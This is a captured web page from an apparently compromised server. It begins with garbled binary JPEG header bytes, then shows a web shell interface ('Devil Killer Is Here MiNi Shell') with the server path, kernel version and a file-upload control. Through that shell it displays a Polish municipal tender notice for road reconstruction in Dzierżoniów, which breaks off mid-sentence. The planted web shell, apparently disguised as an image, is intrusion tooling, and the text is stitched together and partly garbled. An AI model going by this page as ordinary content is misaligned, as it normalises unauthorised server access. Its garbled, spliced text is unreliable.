JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230124/0005388401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wyk. robót bud.w ramach zadania inwest. pn.: „Przebudowa dróg dojazdowych do SP nr 3 w Dzierżoniowie oraz ul. Szkolnej i ul. 11-Listopada (od ul. T. Kościuszki do skrzyżowania z ul. Szkolną)” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Dzierżoniów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 890717830</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dzierżoniów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL517 - Wałbrzyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">746450882</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">746450882</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@um.dzierzoniow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/, https://bip.um.dzierzoniow.pl/, https://dzierzoniow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wyk. robót bud.w ramach zadania inwest. pn.: „Przebudowa dróg dojazdowych do SP nr 3 w Dzierżoniowie oraz ul. Szkolnej i ul. 11-Listopada (od ul. T. Kościuszki do skrzyżowania z ul. Szkolną)” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-96a5dbd6-9bc8-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00053884</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-01-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00005591/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.14 Przebudowa dróg dojazdowych do SP nr 3 w Dzierżoniowie oraz ul. Szkolnej i 11 Listopada (od ul. T.Kościuszki do skrzyżowania z ul. Szkolną)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dzierzoniow.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dzierzoniow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na platformie zakupowej eZamawiajacy, tj.: Stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s; Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu<br/>operacyjnego oraz wymagania używanej przeglądarki internetowej. Zainstalowana dowolna przeglądarka internetowa w wersji<br/>wspieranej przez producenta obsługująca TLS 1.2. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie<br/>.pdf. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert. Oznaczenie czasu odbioru danych<br/>przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego<br/>odpowiednim źródłem czasu. Zamawiający określił dopuszczalne formaty przesyłanych danych w SWZ tj. plików o wielkości do 2<br/>GB. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .rtf .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W<br/>celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip lub .7Z. Wymagania<br/>techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej zostały opisane na Platformie w<br/>zakładce „Baza Wiedzy/Plany zamówień publicznych” pod adresem internetowym https://dzierzoniow.ezamawiajacy.pl/. Wszelką<br/>korespondencję związaną z postępowaniem, należy przekazywać za pośrednictwem Platformy. Korespondencję uważa się za<br/>przekazaną w terminie, jeżeli dotrze do Zamawiającego przed upływem wymaganego terminu. Każda ze stron na żądanie drugiej<br/>niezwłocznie potwierdzi fakt otrzymania wiadomości elektronicznej. Oferta wraz z załącznikami musi zostać w ogólnie przyjętych<br/>formatach danych i złożona w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem osobistym albo podpisem zaufanym pod rygorem nieważności. Sposób sporządzenia<br/>dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów musi być zgodny z wymogami określonymi w<br/>Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w<br/>sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od<br/>wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady<br/>(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.<br/>Urz.UEL 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: Administratorem Danych jest Gmina Miejska Dzierżoniów<br/>reprezentowana przez Burmistrza Dzierżoniowa ul. Rynek 1, 58-200 Dzierżoniów tel. 74 645 0800; Inspektor Ochrony Danych -<br/>Kontakt: Urząd Miasta w Dzierżoniowie, ul. Rynek 1, pok. 22 tel. 74 645 0808, e-mail: inspektorodo@um.dzierzoniow.pl; Będziemy<br/>przetwarzać Twoje dane w celu przeprowadzenia zamówienia publicznego, a w przypadku wyboru najkorzystniejszej oferty w celu<br/>zawarcia i realizacji umowy, Będziemy przetwarzać Twoje dane na podstawie: 1. Art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest<br/>niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze 2. Ustawy z dnia11.09.2019r. Prawo zamówień<br/>publicznych wraz z aktami wykonawczymi do ustawy 3. Ustawy z dnia 27.08.2009r. o finansach publicznych. W przypadku wyboru<br/>najkorzystniejszej oferty również na podstawie art. 6 ust. 1 lit. b) RODO- tj. przetwarzanie jest niezbędne do wykonania umowy,<br/>której stroną jest<br/>osoba, której dane dotyczą lub do podjęcia działań na żądanie osoby, której dane dotyczą przed zawarciem umowy; Twoje dane<br/>osobowe będą przechowywane przez okres wynikający z jednolitego rzeczowego wykazu akt lub przez okres trwałości projektu dofinansowanego ze źródeł zewnętrznych wynikający z odrębnych przepisów prawa;Obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; Odbiorcy Twoich danych - Twoje dane osobowe w postaci nazwy/imienia i nazwiska oraz adresu prowadzenia działalności<br/>gospodarczej mogą zostać udostępnione:- w Biuletynie Zamówień Publicznych / w Dzienniku Urzędowym Unii Europejskiej,- na<br/>Platformie Zakupowej eZamawiający, -w Biuletynie Informacji Publicznej Urzędu Miastaw Dzierżoniowie,- wykonawcom biorącym<br/>udział w postępowaniu,-organom upoważnionym na mocy przepisów prawa,- wykonawcom świadczącym usługi na rzecz<br/>Zamawiającego, min. firma Market Planet Otwarty Rynek Elektroniczny S.A.-dostawca platformy zakupowej do obsługi zamówień<br/>publicznych.Ponadto po zawarciu umowy w/w dane mogą zostać udostępnione każdej osobie, która wystąpi z wnioskiem o ich<br/>udostępnienie w trybie dostępu do informacji publicznej (jeśli nie będą zachodziły przesłanki wyłączające); Twoje<br/>prawa związane z przetwarzaniem danych osobowych - Przysługują Ci, w sytuacjach określonych prawem, następujące prawa<br/>związane z przetwarzaniem danych osobowych:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;- na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w<br/>art. 18 ust. 2 RODO ; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;Nie przysługuje Ci:- w związku z art. 17 ust. 3 lit.<br/>b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20<br/>RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Klauzula informacyjna stanowi załącznik nr 8 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZI-1.271.4.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Przedmiotem zamówienia jest wykonanie robót budowlanych związanych z realizacją zadania inwestycyjnego pn.: „Przebudowa dróg dojazdowych do Szkoły Podstawowej nr 3 w Dzierżoniowie oraz ul. Szkolnej i ul.11-Listopada (od ul. T. Kościuszki do skrzyżowania z ul. Szkolną)”. Inwestycja będzie dofinansowana ze środków z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych nr Edycja2/2021/1590/Polski Ład. <br/>2. Zakres przedmiotu zamówienia, o którym mowa w ppkt 1.1 dotyczy:<br/>1) przebudowy dróg dojazdowych do Szkoły Podstawowej nr 3 w Dzierżoniowie w oparciu <br/>o posiadaną przez Zamawiającego dokumentację projektową, dla której została wydana decyzja pozwolenia na budowę nr 30/2021 z dnia 08.01.2021r.<br/>2) przebudowy ul. Szkolnej i ul. 11-Listopada (od ul. T. Kościuszki do skrzyżowania <br/>z ul. Szkolną) w oparciu o posiadaną przez Zamawiającego dokumentację projektową, dla której zostało wydane zaświadczenie o braku podstaw do wniesienia sprzeciwu <br/>nr BA.6743.1.144.2017 z dnia 07.11.2017r.<br/>3. Szczegółowy zakres przedmiotu zamówienia, został określony w:<br/>1) dla przebudowy dróg dojazdowych do Szkoły Podstawowej nr 3 w Dzierżoniowie:<br/>a) projekcie budowlanym dla przebudowy dróg dojazdowych do Szkoły Podstawowej nr 3 w Dzierżoniowie. Jednostka projektowa: Przedsiębiorstwo budowlane „INŻBUD” Tomasz Zieliński, ul. Radkowska 61a, 57-402 Nowa Ruda;<br/>b) projekcie wykonawczym dla przebudowy dróg dojazdowych do Szkoły Podstawowej nr 3 w Dzierżoniowie. Jednostka projektowa: Przedsiębiorstwo budowlane „INŻBUD” Tomasz Zieliński, ul. Radkowska 61a, 57-402 Nowa Ruda;<br/>c) projekcie stałej organizacji ruchu w związku z realizacją robót przebudowa dróg dojazdowych do szkoły nr 3;<br/>d) projekcie czasowej organizacji ruchu w związku z realizacją robót przebudowa dróg dojazdowych do szkoły nr 3; Jednostka projektowa: Przedsiębiorstwo budowlane „INŻBUD” Tomasz Zieliński, ul. Radkowska 61a, 57-402 Nowa Ruda;<br/>e) specyfikacji technicznej wykonania i odbioru robót – grudzień 2020;<br/>f) przedmiar robót jako materiał pomocniczy. Projekcie Budowlanym: „Remont <br/>ul. Pocztowej w Dzierżoniowie wraz z przebudową sieci oświetlenia ulicznego ”. <br/> 2) dla przebudowy ul. Szkolnej i ul. 11-Listopada (od ul. T. Kościuszki do skrzyżowania <br/>z ul. Szkolną):<br/>a) projekcie budowlanym dla inwestycji pod nazwą: „Przebudowa ul. Szkolnej i 11 listopada od ul. Kościuszki do ul. Szkolnej”: układ komunikacyjny-kanalizacja deszczowa-oświetlenie. Jednostka projektowa: Pracowania Projektowania i Nadzoru DRO-INSTAL mgr inż. Kazimierz Strzelczyk, ul. Świdnicka 24, 58-200 Dzierżoniów;<br/>b) projekcie wykonawczym dla inwestycji pod nazwą: „Przebudowa ul. Szkolnej i 11 listopada (od ul. Kościuszki do ul. Szkolnej): układ komunikacyjny. Jednostka projektowa: Pracowania Projektowania i Nadzoru DRO-INSTAL mgr inż. Kazimierz Strzelczyk, <br/>ul. Świdnicka 24, 58-200 Dzierżoniów;<br/>c) projekcie budowlano-wykonawczym dla inwestycji pod nazwą: „Przebudowa <br/>ul. Szkolnej i 11 listopada (od ul. Kościuszki do ul. Szkolnej): oświetlenie uliczne. Jednostka projektowa: Pracowania Projektowania i Nadzoru DRO-INSTAL mgr inż. Kazimierz Strzelczyk, ul. Świdnicka 24, 58-200 Dzierżoniów;<br/>d) projekcie wykonawczym dla inwestycji pod nazwą: „Przebudowa ul. Szkolnej i 11 listopada (od ul. Kościuszki do ul. Szkolnej): kanalizacja deszczowa. Jednostka projektowa: Pracowania Projektowania i Nadzoru DRO-INSTAL mgr inż. Kazimierz Strzelczyk, <br/>ul. Świdnicka 24, 58-200 Dzierżoniów;<br/>e) projekcie docelowej organizacji ruchu w zakresie gminnej drogi wewnętrznej dla inwestycji pod nazwą: &#34;Przebudowa ul. Szkolnej i 11 listopada (od ul. Kościuszki do <br/>ul. Szkolnej). Jednostka projektowa: Pracowania Projektowania i Nadzoru DRO-INSTAL mgr inż. Kazimierz Strzelczyk, ul. Świdnicka 24, 58-200 Dzierżoniów;<br/>f) projekcie tymczasowej organizacji ruchu na czas prowadzenia robót budowlanych dla inwestycji pod nazwą: &#34;Przebudowa ul. Szkolnej i 11 listopada (od ul. Kościuszki do <br/>ul. Szkolnej). Jednostka projektowa: Pracowania Projektowania i Nadzoru DRO-INSTAL mgr inż. Kazimierz Strzelczyk, ul. Świdnicka 24, 58-200 Dzierżoniów;<br/>g) projekcie nasadzeń zastępczych dla inwestycji pod nazwą: „Przebudowa ul. Szkolnej<br/> i 11 listopada (od ul. Kościuszki do ul. Szkolnej).<br/>h) szczegółowej specyfikacji technicznej wykonania i odbioru robót budowlanych dla inwestycji pod nazwą: „Przebudowa ul. Szkolnej i 11 listopada od ul. Kościuszki do <br/>ul. Szkolnej” wykonał - mgr inż. Kazimierz Strzelczyk;<br/>i) przedmiar robót stanowiący materiał pomocniczy do oszacowania ceny ofertowej Wykonawcy.<br/>Zakres robót przebudowy ul. Szkolnej, nie obejmuje budowy 22 miejsc parkingowych oraz wycinki 4 szt. drzew – zgodnie z załącznikiem nr 24.<br/>4. Wykonawca zobowiązany jest do wykonania zakresu robót wskazanych w dokumentacji projektowej, w tym projekcie budowlanym i wykonawczym, który jest określony w formie opisu technicznego lub na rysunkach lub równocześnie w opisie i na rysunkach. Zarówno opis techniczny jak i rysunki (część graficzna) projektów są równoważne i opisują przedmiot zamówienia.<br/>5. Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną <br/>i zgodnie z zaleceniami nadzoru inwestorskiego, dokumentacją wymienioną w § 1 ust. 3 projektu umowy (załącznik nr 7 do SWZ) z uwzględnieniem likwidacji barier architektonicznych dla osób niepełnosprawnych.<br/>Ponadto, Wykonawca zobowiązany jest do wykonania robót towarzyszących związanych <br/>z przebudową w/w ulic i ich powiązania z istniejącymi sąsiadującymi ulicami, chodnikami, budynkami, dojściami do budynków, schodami, platformami itp. Wykonawca winien dostosować, <br/>a w razie potrzeby przebudować wszystkie dojazdy, dojścia, schody, platformy itp. do nowej niwelety zrealizowanych nawierzchni jezdni, chodników, ścieżki rowerowej itp. z właściwym odprowadzeniem wód deszczowych. W przypadku ingerencji w obiekty przyległe, bądź ich uszkodzenie należy uwzględnić ich naprawę, uzupełnienie, regulację wysokościową itp.<br/>6. Wykonawca oprócz w/w obowiązków wynikających z § 1 projektu umowy (załącznik nr 10 do SWZ) zobowiązuje się do:<br/>1) protokolarnego przejęcia terenu budowy, jego zabezpieczenia i należytego oznakowania oraz wystąpienia do gestorów sieci o protokolarne przekazanie urządzeń na czas prowadzenia robót, <br/>a po zakończeniu prac protokolarne przekazanie ich właścicielom, a także udostępnienie placu budowy gestorom sieci celem wykonania przez nich robót remontowych na swoich zasobach jeżeli zajdzie taka konieczność,<br/>2) zapewnienia w trakcie prowadzonych robót dojść i dojazdów do posesji zlokalizowanych <br/>w obrębie inwestycji, w tym dojazdu dla służb ratowniczych, <br/>3) organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników i miejsca składowania materiałów,<br/>4) zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę. Wykonawca we własnym zakresie zapewnia niezbędne media warunkujące prawidłowe wykonawstwo robót,<br/>5) poniesienia wszelkich kosztów związanych z realizacją, nadzorem i wypełnieniem wszystkich zobowiązań wynikających, z decyzji o pozwoleniu na budowę/brakiem sprzeciwu oraz zobowiązań wynikających z uzyskanych uzgodnień i opinii oraz tych, które Wykonawca zobowiązany jest uzyskać w trakcie realizacji robót budowlanych,<br/>6) wykonania badań, prób i pomiarów w czasie wykonywania robót budowlanych <br/>i badań odbiorczych zgodnie ze specyfikacją techniczną,<br/>7) przekazania Zamawiającemu w dniu podpisania umowy oświadczeń o podjęciu obowiązków przez kierownika budowy i kierowników robót,<br/>8) czyszczenia na bieżąco nawierzchni przyległego terenu i ulic w przypadku nawożenia błota <br/>z terenu budowy na kołach maszyn, samochodów i innych urządzeń technicznych,<br/>9) uporządkowania terenu budowy i przywrócenia terenu przyległego po zakończeniu robót do stanu pierwotnego,<br/>10) wywozu materiału i gruzu z rozbiórki, mas mineralno-bitumicznych i zbędnych materiałów oraz niepotrzebnych urządzeń na składowisko odpadów i poniesienia kosztów ich składowania <br/>i utylizowania,<br/>11) obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego wraz ze stroną tytułową i legendą oraz w formie elektronicznej na płycie CD,<br/>12) ochrony punktów osnowy geodezyjnej, a w przypadku ich zniszczenia, bądź uszkodzenia lub konieczności przeniesienia zlecenia uprawnionej jednostce wykonawstwa geodezyjnego ich odtworzenia lub założenia nowych,<br/>13) przedłożenia Zamawiającemu przed podpisaniem umowy dokumentów wynikających z SWZ,<br/>14) wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,<br/>15) uczestnictwa kierownika budowy i kierowników robót branżowych w radach budowy odbywających się nie rzadziej niż raz w tygodniu,<br/>16) przygotowania na bieżąco rozliczeń budowy, faktur według zaleceń Zamawiającego,<br/>17) innych niezbędnych czynności wymaganych przepisami prawa, a związanych <br/>z realizacją przedmiotu zamówienia,<br/>18) pełnienia funkcji koordynacyjnych w stosunku do robót realizowanych przez podwykonawców,<br/>19) wypełnienie zobowiązań również tych leżących po stronie Inwestora (Gminy) wynikających <br/>z uzgodnień, pozwoleń i decyzji zawartych w projekcie budowlanym, jak również tych, które zostaną wydane w toku realizacji robót,<br/>20) przekazania na prośbę Zamawiającemu materiałów porozbiórkowych nadających się do ponownego wbudowania np. krawężnik kamienne, kostka betonowa, kamienna z rozbiórki, którą Wykonawca winien oczyścić, ułożyć na paletach i zafoliować oraz przewieźć na wskazane przez Zamawiającego miejsce w odległości do 10 km od placu budowy. Podobnie inne elementy porozbiórkowe np. oprawy 